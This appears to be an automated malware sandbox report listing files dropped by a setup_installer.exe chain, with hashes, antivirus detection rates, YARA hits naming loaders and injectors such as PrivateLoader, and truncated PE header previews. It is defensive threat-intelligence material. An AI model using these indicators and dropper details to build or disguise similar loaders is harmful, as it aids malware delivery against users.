                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.382206187246794
                                      Encrypted:false
                                      SSDEEP:48:9WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:9LHyIFKL3IZ2KRH9Oug8s
                                      MD5:CD955C5C4961E1F8BD463A3447867229
                                      SHA1:31CE903E58E098AFA747468B40AC8D2FE180E8B1
                                      SHA-256:954B89F5D9BC52B908193E620AAB5538C5A3FA8771ADAE0B29EC64B757640663
                                      SHA-512:444E1ECCB355BEBB65AE56C3D7E2BEF569CE49F9908BCFC70C71CEB59488CBFAEF8A7AEF612C3CBC59D498BBB5A9E57C8AA9FD94F9F1604EDB8F80E41DDD523F
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1229031
                                      Entropy (8bit):7.871335205612416
                                      Encrypted:false
                                      SSDEEP:24576:b062cSEk8zNlLLsZ0zlqHdHvVkOvdxG3HgdBO6RFi:A6PaUsIgRVkOvdUOBU
                                      MD5:7C6B2DC2C253C2A6A3708605737AA9AE
                                      SHA1:CF4284F29F740B4925FB2902F7C3F234A5744718
                                      SHA-256:B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                                      SHA-512:19579900D07912096641CC7381131FF6FCF60FFFC99CDAB23F7D8A577AA926BBF0E885A3A7869298BBFC0A05E276C1D5F45712812E4DF6980E9554FC48162B07
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Joe Sandbox View:
                                      • Filename: 67A38378609C0EB8141A74E7BAA052B01FF5734319B4E.exe, Detection: malicious
                                      • Filename: 582BD655F491FE76A95B9C8900A3051D379DCBB86036F.exe, Detection: malicious
                                      • Filename: E4FB39B3F6AA19028CCDD531437E7994A9B6F62B317AD.exe, Detection: malicious
                                      • Filename: 6AA0D341CEE633C2783960687C79D951BF270924DF527.exe, Detection: malicious
                                      • Filename: F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exe, Detection: malicious
                                      • Filename: 7287980C1AFB840A7438471126C0C95C36FEFA79A013F.exe, Detection: malicious
                                      • Filename: CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe, Detection: malicious
                                      • Filename: 822EE6C4B4BB9A619985E83C04A2DFE1A09152DC0276B.exe, Detection: malicious
                                      • Filename: ZErNFYRzCC.exe, Detection: malicious
                                      • Filename: 84B3387D512191B0764FDE9A03D827CB42FFE33D864B1.exe, Detection: malicious
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):485693
                                      Entropy (8bit):6.861493611111775
                                      Encrypted:false
                                      SSDEEP:12288:DT53eTAzDdjqC3RK+zJjZQhmgj+fqKbWstEB22FDz:D1uoD1R9FlL8BKb3kz
                                      MD5:4BF3493517977A637789C23464A58E06
                                      SHA1:519B1FD3DF0A243027C8CF4475E6B2CC19E1F1F4
                                      SHA-256:CCF0F8D1770436E1CD6CDCFA72D79A791A995A2F11D22BDF2B1E9BFBDD6F4831
                                      SHA-512:4D094E86E9C7D35231020D97FBCC7D0C2F748D1C22819D1D27DABBB262967800CC326911A7E5F674461D9932E244AFFE9A01FA9527F53248E5867490E0E09501
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\09xU.exE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):129649
                                      Entropy (8bit):6.876070899801249
                                      Encrypted:false
                                      SSDEEP:3072:DlqIkb/EZrlPDKozjRIKuG+zTRn8CIj828:DBZrlLKoh5uG+zFn8CII28
                                      MD5:6C83F0423CD52D999B9AD47B78BA0C6A
                                      SHA1:1F32CBF5FDACA123D32012CBC8CB4165E1474A04
                                      SHA-256:4D61A69E27C9A8982607ACE09F0F507625F79050BDF7143C7FE0701BF1FAB8AE
                                      SHA-512:E3D1537F4B22CEADFEF3B30216B63320B397A179AB9D5F1EB66F93811A2717EE1FB6222989F610ACD4C33FAE6078C3DF510022B5748A4F1D88EBF08C12F9DEEC
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):91648
                                      Entropy (8bit):6.306103157697128
                                      Encrypted:false
                                      SSDEEP:1536:k7MGKViupm7ir2Ooe+JciT1GdeYH2JaGdVtcrYxam5+s8jcduhWfM3IP:k7vYZoBPTcYYH2cG6r4J7kWU3Q
                                      MD5:37A1C118196892AA451573A142EA05D5
                                      SHA1:4144C1A571A585FEF847DA516BE8D89DA4C8771E
                                      SHA-256:A3BEFD523E1E2F4E6F8FCE281963F5EFB85FE54D85BA67746CC58823D479E92A
                                      SHA-512:AAC6321582DAC5D82CBDB197C20370DF3436CF884BEA44CBC6D156FD6C4FA99340A3FA866862B83FB0866B31A1E4EBDD73C462972BEEB299D4AF95592C1D94DB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):449024
                                      Entropy (8bit):6.6805076510214105
                                      Encrypted:false
                                      SSDEEP:6144:jn1XcyLxXJLpp+g4E9lubahTKXGLFBh4j9dA0SvKLhf+2lHnBCw0qt:RvxRflMGTuIbKJdA0SvKLflHnBzN
                                      MD5:0FC8BA6DE4099DDC991EADE9B86A6F06
                                      SHA1:7B723301027C1C6979561BC60B2BE47D481C7C17
                                      SHA-256:C0658B1C3245FDF7C34D69AFD2962131243C6B615F53B0A0C85635DDBC15497A
                                      SHA-512:8C1EE3032CAE73F91D162F37DAEAEC265E2478495DF90626737C48FC523FF8E3383BA6CF5DDFAFAB24ECF134A816CA167AC3A9535CCFD3059E8374C6A27C17DF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):8192
                                      Entropy (8bit):4.682405663673775
                                      Encrypted:false
                                      SSDEEP:96:LJOElmu1B9ilJJMOfEkdEKozt1Ex3tHfqcqkTzNt:NLkJwGE3ERtHt1
                                      MD5:C213A2444632FFDF0425E0288BCA48B9
                                      SHA1:CD4985866907BDD1F61AC637EEE7323E624D053F
                                      SHA-256:5565C7F24D0DAD9C8B874603CD5386EFD81E7FF252706AC150B20F0C2FD9ADD7
                                      SHA-512:692AFBDD4C5B20924A10446A045EABAE6E076B8711321A9DEF9A5640A5384DB8E257CBB3533143C1046B77C58715C6C48D5827804C8E80C983FF16E7B9C9C395
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tda.............................4... ...@....@.. ....................................@..................................4..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................4......H.......L$..@............................................................0..........~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&r...p(.....(....r...p(.......(.....(....~....&*...0..q....... ....(.....(....t......r...po.....o....t......o.....s.......o.....o.....o.....o.........,..o.....& ....(.......*.........:..W..........aa.......0..........(....o....r...p(.......(.......( ...-.(!...o"......(
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):432128
                                      Entropy (8bit):3.7368470950969326
                                      Encrypted:false
                                      SSDEEP:6144:St0hhlTEZ+iEcvpbHC7dd+63gmyFK/To5e:FhhlTEZ+iEcvpbHC7dd+63gmyFK/k5
                                      MD5:B6B87E674629A0F112CB1283B0322CCB
                                      SHA1:F35F95A13C24D07460D7A4C14D20D27B2E202539
                                      SHA-256:64BD25466E41DF79BBF715E4E068829F58CAB364283AB1D0BAAEBF957C836899
                                      SHA-512:D5704D375CE6578B7B4C83FE5B8778AE0D8C596ED5ADB533A4CA42A1F05FDF40FC0C90D3E6E10C0AD738EE1E3F6D7264E64826401B7321FC46B4DF32EAC45079
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 81%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.W...............0.............^.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................@.......H......../...3...........................................................0..........~....u....s....z&.....*.................2(.... e...j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......r...p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..A.......~.....s.......8.........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):64000
                                      Entropy (8bit):6.92354142826486
                                      Encrypted:false
                                      SSDEEP:768:9DTH3hg+oJrVGPZuVTNOTgmecxbDwf2F5ISJQF65e/yRALOxMYYG1A8RnBbEOp0/:9DDloThmecxbDssrJQ6k/05DhOjOV3v
                                      MD5:D082843D4E999EA9BBF4D89EE0DC1886
                                      SHA1:4E2117961F8DAC71DDE658A457FB6A56D5A6F1AA
                                      SHA-256:0F3822EFA9FA3FCB532A043DF68175865ECA68A2805B1415D0D89DE69A49628B
                                      SHA-512:B51811D489636B6266131452F7CB0BF294D855F1BAAA078894051CD19169C2B3E4496E46026C2B2B375F979619E4F8D2F939F05FC9E8FC888A836C01586DB2CA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 81%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......h.......`....... ....@.. ...............................q....@.................................`...K.... .......................@.......................................................`..................H...........[$vd.Pf#.M... ...N..................@....text................R.............. ..`.rsrc........ ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):439808
                                      Entropy (8bit):6.571863080131404
                                      Encrypted:false
                                      SSDEEP:12288:mUEg0pPvwCCCNUZDBL+MlU43opBzcWzuuZVY6:mdvpnwJXBaMx3opBVu
                                      MD5:ECC773623762E2E326D7683A9758491B
                                      SHA1:AD186C867976DC5909843418853D54D4065C24BA
                                      SHA-256:8F97A40B4D9CF26913AB95EEC548D75A8DAD5A1A24D992D047E080070282D838
                                      SHA-512:40E30981F533B19123EC3D84276A28ACD282C01907398CA6D67155901CFAF2C2D6355DC708D0ECFC6C21B5C671B4C3BB87EEB53183B7085474A2ACD302F038A4
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w..$..$..$. $..$..$..$..$..$..-$..$..$..$..$..$.$$..$.#$..$Rich..$........PE..L.....K`.................^...X(......O.......p....@..................................(.......................................a..d.....,..A....................-.."..`...................................@............................................text....].......^.................. ..`.data....1'..p... ...b..............@....rsrc....A....,..B..................@..@.reloc........-.....................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):412160
                                      Entropy (8bit):5.487293211993093
                                      Encrypted:false
                                      SSDEEP:6144:tMfrO6FHMcQTkvu0aaQEv1pE0EAPMrGWsWDWidF0HQszCZ2Ftppb9Y81+k7pq7FX:tsOUHzvu0aaRS2z2
                                      MD5:06EE576F9FDC477C6A91F27E56339792
                                      SHA1:4302B67C8546D128F3E0AB830DF53652F36F4BB0
                                      SHA-256:035373A454AFD283DA27EBF569AB355BE7DB470A1A30C3695E18C984B785E1F8
                                      SHA-512:E5B337158905651E2740378615FCD9A8BA2B5E46F02C75BE20C22E89B4CB40E8F1DFEC1C5C1135F4D59114DA9200A772F591622EDDB865880B296321D80FB616
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 66%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bT..&5..&5..&5..2^..,5..2^...5..2^..45..-Z..75..-Z..05..-Z...5..2^..%5..&5..{5...Z..%5...Z..'5..&5|.'5...Z..'5..Rich&5..........................PE..L.....ca.................\...................p....@.......................................@.....................................(........]...................`..p.......................................@............p..,............................text....[.......\.................. ..`.rdata...j...p...l...`..............@..@.data...............................@....rsrc....].......^..................@..@.reloc..p....`.......4..............@..B........................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1422336
                                      Entropy (8bit):6.458131255146092
                                      Encrypted:false
                                      SSDEEP:24576:ur0Y0b3wTBY0zc3OHmIOss9/DQTBlFadP6WNltPSQv:ub6gT20iOHmIPWDQll86Ytfv
                                      MD5:F3B4EE77D66819821E9921B61F969BAE
                                      SHA1:4615610C80FF5D2E251D0D91ABBE623ACFA74F7C
                                      SHA-256:DD2FF55CF7F143254E8478619014BC083E65DD48EF2329E45D39FE65D5E5CC73
                                      SHA-512:58DED47D2BCD88D6F79D35F7406BFCF22B889B52E6F293C12201DE5CEB834D3905472D9C384B469BB42DE74E3EAB429A39918B3368107002C1F4ABC252328D6E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Generic_malware, Description: Yara Generic_malware, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 85%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`...`...`...t..u...t..m...t........G......a.....p.....j.........t..m...`.........h.....y.a......a...Rich`...................PE..d....XYa.........."......N...b.......3.........@.............................0............`.................................................<...x.......<.... ..(................$......p.......................(.......0............`..(............................text...\L.......N.................. ..`.rdata......`.......R..............@..@.data...$.... ......................@....pdata..(.... ......................@..@_RDATA..............................@..@.rsrc...<...........................@..@.reloc...$.......&..................@..B........................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1229031
                                      Entropy (8bit):7.871335205612416
                                      Encrypted:false
                                      SSDEEP:24576:b062cSEk8zNlLLsZ0zlqHdHvVkOvdxG3HgdBO6RFi:A6PaUsIgRVkOvdUOBU
                                      MD5:7C6B2DC2C253C2A6A3708605737AA9AE
                                      SHA1:CF4284F29F740B4925FB2902F7C3F234A5744718
                                      SHA-256:B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                                      SHA-512:19579900D07912096641CC7381131FF6FCF60FFFC99CDAB23F7D8A577AA926BBF0E885A3A7869298BBFC0A05E276C1D5F45712812E4DF6980E9554FC48162B07
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 58%
                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........}.m...m...m..#.a..m..#.c..m..#.b..m....W..m...3./.m...3./.m...3./.m.......m.......m...m..nm...3./.m...3./.m...3o..m...3./.m..Rich.m..........................PE..L... .m`.................b..........0?............@.......................................@.............................4.......<............................`.. (.. ...T...........................H...@............... ............................text....a.......b.................. ..`.rdata..$............f..............@..@.data....M... ......................@....didat..\....p......................@....rsrc...............................@..@.reloc.. (...`...*..................@..B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):442368
                                      Entropy (8bit):3.7390611649225955
                                      Encrypted:false
                                      SSDEEP:12288:3hhlDEI+iEHvpbAC7dMuke/3FIVJIKlO5g:Xl9KIV
                                      MD5:5721981400FAF8EDB9CB2FA1E71404A2
                                      SHA1:7C753BAFD9AC4A8C8F8507B616EE7D614494C475
                                      SHA-256:15D244BA6413C14E9E0E72B8AE123CA49812B15398208E4AAB1422160DA75E0F
                                      SHA-512:4F4E36EF1EE116681B780FE4E71F97215797DF55E51E3818D7B7495F284723FCFFD233FC01A66863573C2AD70B77821EF0880A3B58B300C5233D5A636B019C57
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z................0.................. ........@.. ....................... ............@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H......../..00...........................................................0..........~....u....s....z&.....*.................2(.... .F..j*....r...p(....*.s....%.}..........s....o....9....s....z*....(.........*2.s....(....*...v.(......rg..p~....o....(....*....{....*.0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}....*....0...........o......o....(.....(.....o....*.6..(....(....*...0..A.......~.....s.......8.........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):348672
                                      Entropy (8bit):6.015664208947374
                                      Encrypted:false
                                      SSDEEP:6144:IQ31DWvFRu0pIIC6nVm6j4qYmSkF/bzOdzzJIlt+MSq:9DWvSIvVNMqYmSkF/CzNIls
                                      MD5:BE60D71B303F2AAE5618315147C7D3F9
                                      SHA1:3193AA204C2CF5A82AC532AB9FD436ACAD7953C1
                                      SHA-256:E4BA726FBD2C56CD2426BA04823637264BE89A9807A935D0939DC1578BDD951E
                                      SHA-512:2C15B655B0CC12EB7BD5329A922DBDBA6F226748F45D03C777980CCE79A841C28A1D9DC1283D0A5C361E4EBD537F2BA4C1B44F59D3A5FAF132EAE48F1F884A77
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L......^......................(.....`.............@...........................,.................................................<.....+..s....................+.....0...................................@............................................text............................... ..`.data...P-'.........................@....rsrc....s....+..t..................@..@.reloc........+......b..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):223232
                                      Entropy (8bit):7.91725038805347
                                      Encrypted:false
                                      SSDEEP:6144:Kk3jgivfCVSRrLV7yAVzKZIjCbanUKWw+ba//PXHUo:30iH0iVPVzKOOunLWf2//0
                                      MD5:D09BE1F47FD6B827C81A4812B4F7296F
                                      SHA1:028AE3596C0790E6D7F9F2F3C8E9591527D267F7
                                      SHA-256:0DE53E7BE51789ADAEC5294346220B20F793E7F8D153A3C110A92D658760697E
                                      SHA-512:857F44A1383C29208509B8F1164B6438D750D5BB4419ADD7626986333433E67A0D1211EC240CE9472F30A1F32B16C8097ACEBA4B2255641B3D8928F94237F595
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J4e`....Y......!..............................Dk.......................................... .........................-... ...<....................................................................................................................text............t..................`.P..data.... ...........z..............@.`..rdata...........F..................@.`./4...............4..................@.0..bss....h.............................`..edata..............................@.0..idata... ..........................@.0..CRT................................@.0..tls................................@.0..rsrc...............................@.0..reloc...@.......&..................@.0./14..........P.......8..............@.@./29...... ...`.......:..............@.../41..................J..............@.../55..................L..............@.../67..................N..
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):55808
                                      Entropy (8bit):6.9891040161841085
                                      Encrypted:false
                                      SSDEEP:768:W//WT2mbP+7x4Mx5KzVAn/QqvtdZs8LlR67diTNh4joK7qmQhyOl4UuGoxX9j3D:WHIK1R2VA/Qqvtzz67dbn1QhyOl4UuD
                                      MD5:E6E578373C2E416289A8DA55F1DC5E8E
                                      SHA1:B601A229B66EC3D19C2369B36216C6F6EB1C063E
                                      SHA-256:43E86D650A68F1F91FA2F4375AFF2720E934AA78FA3D33E06363122BF5A9535F
                                      SHA-512:9DF6A8C418113A77051F6CB02745AD48C521C13CDADB85E0E37F79E29041464C8C7D7BA8C558FDD877035EB8475B6F93E7FC62B38504DDFE696A61480CABAC89
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: MALWARE_Win_DLInjector03, Description: Detects unknown loader / injector, Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 18%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Gf`....B......!.........T.......0............(k.........................`......x......... ...................... ..0F.. @..$...........................DA...............................?.......................................................text............4..................`.P..data................:..............@.0..rdata...............<..............@.`./4.......@...........B..............@.0..bss..................................`..edata...P... ...H...R..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc..............................@.0./14.................................@.@./29...... ..........................@.../41.................................@.../55.................................@.../67.................................@.0./80.......... ..........
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):116238
                                      Entropy (8bit):6.249236557413483
                                      Encrypted:false
                                      SSDEEP:3072:nti6N0WeF35Ro7hAWP6cagLSuf6LG3qSbKE4M:ti6N2F33wGJVuHuE
                                      MD5:9AEC524B616618B0D3D00B27B6F51DA1
                                      SHA1:64264300801A353DB324D11738FFED876550E1D3
                                      SHA-256:59A466F77584438FC3ABC0F43EDC0FC99D41851726827A008841F05CFE12DA7E
                                      SHA-512:0648A26940E8F4AAD73B05AD53E43316DD688E5D55E293CCE88267B2B8744412BE2E0D507DADAD830776BF715BCD819F00F5D1F7AC1C5F1C4F682FB7457A20D0
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....n.........................0................ .........................u.................................... ..$...........................D........................................................text....\.......^..................`.P`.data...,....p.......b..............@.0..rdata..T............d..............@.`@/4.......4.......4...r..............@.0@.bss..................................`..edata..u...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..$.... ......................@.0B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):662528
                                      Entropy (8bit):7.222450867745387
                                      Encrypted:false
                                      SSDEEP:12288:ZGRoW1chMjnv+gvJhb6bmpPSmCnh4o0v4Mc2jTrKoDSwq/3PmkfT4CmwcMcP1uE:uowcmBhKmlC4o0v4k1
                                      MD5:5E279950775BAAE5FEA04D2CC4526BCC
                                      SHA1:8AEF1E10031C3629512C43DD8B0B5D9060878453
                                      SHA-256:97DE47068327BB822B33C7106F9CBB489480901A6749513EF5C31D229DCACA87
                                      SHA-512:666325E9ED71DA4955058AEA31B91E2E848BE43211E511865F393B7F537C208C6B31C182F7D728C2704E9FC87E7D1BE3F98F5FEE4D34F11C56764E1C599AFD02
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...........0.......`.....o.........................`............... ..........................w.. @..$...........................DA...............................?.......................................................text....P.......B..................`.P..data.... ...`.......F..............@.`..rdata...........>...H..............@.`./4...........`......................@.0..bss..................................`..edata...........x...6..............@.0..idata... ...p......................@.0..CRT................................@.0..tls................................@.0..reloc...........P..................@.0..aspack.. ...0......................`....adata.......P......................@...................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):70656
                                      Entropy (8bit):6.292322392729986
                                      Encrypted:false
                                      SSDEEP:1536:xPCESXKWzkxTz8uLfdkWr2sUX8YNKykl1wwwwUXrMZE4cYdz:x6baWwxH8EzSHYZE4cYdz
                                      MD5:1E0D62C34FF2E649EBC5C372065732EE
                                      SHA1:FCFAA36BA456159B26140A43E80FBD7E9D9AF2DE
                                      SHA-256:509CB1D1443B623A02562AC760BCED540E327C65157FFA938A22F75E38155723
                                      SHA-512:3653F8ED8AD3476632F731A3E76C6AAE97898E4BF14F70007C93E53BC443906835BE29F861C4A123DB5B11E0F3DD5013B2B3833469A062060825DF9EE708DC61
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.Q...........#................@..............d......................................... ...................... ..,....@..,....p..P.......................(............................`.......................A..d............................text...............................`.P`.data...............................@.0..rdata..............................@.`@.bss..................................`..edata..,.... ......................@.0@.idata..,....@......................@.0..CRT....0....P......................@.0..tls.... ....`......................@.0..rsrc...P....p......................@.0..reloc..(...........................@.0B................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2249157
                                      Entropy (8bit):6.013411034364978
                                      Encrypted:false
                                      SSDEEP:24576:WuaTARYeYm0Xfw1twSiIr9ZUGRY6mPMol3juQ55313N:WuXCfGRnql3F
                                      MD5:33D05F6171D18F49EDD9C5B1BC5B8C72
                                      SHA1:DC5CEB79B3E91225EF363EE9BAF9A32877BD1FE9
                                      SHA-256:299D4AFC166F5AABFDD48C1477BAC071E3BE9126756FC7E57925AA49F8D9CF85
                                      SHA-512:EDAE7BFD931B06D2725ED88AC6E14AD800DF8A867FE29CFD76832B44546E9C562FD428C802E9050DF8C9A56E87A4EE3862B4488A8143A99B18E6C56988CC7935
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 68%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yda....aY...............T....................@..................................$#....... .................................(............................................................Y.......................... ............................text...............................`.P`.data...............................@.`..rdata....... ......................@.`@/4..................................@.0@.bss.........p........................`..idata..(............D..............@.0..CRT....4............T..............@.0..tls.................V..............@.0./14..................X..............@.@B/29..................Z..............@..B/41..........P......................@..B/55......U...p...V..................@..B/67.....8............Z..............@.0B/80..................\..............@..B/91.....8............`..............@..B/102....................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:i:i
                                      MD5:AC6AD5D9B99757C3A878F2D275ACE198
